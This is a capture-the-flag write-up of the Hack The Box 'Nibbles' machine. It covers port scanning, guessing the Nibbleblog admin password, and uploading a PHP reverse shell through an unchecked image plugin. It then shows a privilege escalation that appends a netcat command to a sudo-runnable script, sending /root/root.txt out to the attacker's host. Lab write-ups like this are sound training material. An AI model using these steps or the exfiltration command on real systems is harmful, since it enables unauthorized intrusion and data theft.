I started off with a quick Nmap scan on the target machine.
nmap -sS -sV -Pn 10.10.10.75 Starting Nmap 7.70 ( https://nmap.org ) at 2018-03-24 00:46 AEST Nmap scan report for 10.10.10.75 Host is up (0.23s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Fairly standard ports open simple ports and because there was an HTTP port open, I decided to see if there was anything meaningful.
Nope, nothing interesting here but when you look into the source we can see something interesting!
Browsing to this directory we stumble across a blog but there is nothing interesting that we can leverage.
This meant more enumeration had to be done. After a little bit of googling, I came across their Github repository located at:
If you look at the repository we can see a few files of interest:
admin.php install.php update.php
There wasn’t anything too interesting inside of install.php and update.php other than just a version number for the hosted web application.
Nibbleblog 4.0.3 "Coffee" ©2009 - 2014 | Developed by Diego Najar
However, admin.php looked like a potential path we can dive into.
I had a quick check on Google to see if there were any exploits available that would allow us to bypass the login page and returned with no results so it meant that I would (most likely) have to bruteforce the login.
Several trial & errors after, I found the credentials which were:
Username: admin Password: nibbles
Inside of the admin panel I couldn’t see anything that I could leverage so I began to enumerate more. I found this link which explains how to exploit a vulnerability to achieve code execution. In short, the image plugin does not check the extensions of uploaded files meaning we could upload a php file and gain code execution.
I found a generic reverse-shell.php (from here) which I modified it with my IP and Port.
With the payload ready to go, all I had to do is get a netcat session running on my VM.
nc -nvlp 8989
With everything locked and loaded, I uploaded my payload via the plugin.
You can see warnings but we can ignore it. The plugin uploads images to this location:
and by navigating to this location, it would trigger the reverse shell back to my VM.
listening on [any] 8989 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.75] 54270 Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 10:59:13 up 11:55, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) /bin/sh: 0: can't access tty; job control turned off $ whoami nibbler
With a shell ready to go, all I had to do was navigate to the nibbler user folder and retrieve the user.txt flag.
$ cd /home/nibbler && dir personal.zip user.txt $ cat user.txt b0----------------------------d8
With the user flag out of the way, I decided to enumerate the machine a little bit more.
On a Linux machine, I always start off with the following command:
This command showed us a few interesting things:
$ sudo -l Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
As you can see, our user can run the file monitor.sh as root. This means that if we can modify this script, we could potentially elevate to root privileges.
If you recall from the previous “dir” command, we had a file called personal.zip. Luckily, the file was not password protected and I was able to unzip the file.
$ unzip personal.zip Archive: personal.zip creating: personal/ creating: personal/stuff/ inflating: personal/stuff/monitor.sh
I navigated to the directory with the bash script file and observed the privileges on it.
$ pwd /home/nibbler/personal/stuff $ ls -la total 12 drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 . drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 .. -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
We have read/write access to this script file.
From here, all I had to do was append my command to this script and it would be run as root.
I quickly navigated to the /bin folder to check for anything I could leverage to get the root flag.
chvt nc tailf cp nc.openbsd tar
I saw that netcat was installed on the computer so I quickly tried to see if this was the version with the -e parameter.
nc -e nc: invalid option -- 'e' This is nc from the netcat-openbsd package. An alternative nc is available in the netcat-traditional package.
This wasn’t too much of a worry because I could just use the traditional netcat to transfer the file onto my VM.
I started a connection on my VM, listening to a file transfer:
nc -l -p 9000 > root.txt
Then I appended my command to the bottom of the monitor script.
echo "nc -w 3 10.10.14.10 9000 < /root/root.txt" >> monitor.sh
All that was left was to run the monitor script.
$ sudo /home/nibbler/personal/stuff/monitor.sh
On my local machine, I can see that my netcat connection has closed which meant that it successfully received the file.
All I had to do was observe the file on my VM and the machine would be conquered!
root@kali:~/Desktop/HackTheBox/Nibbles# cat root.txt b6----------------------------8c
Overall, the machine was fairly simple but fun. It definitely touched on alot of the basics which is always good to keep in check!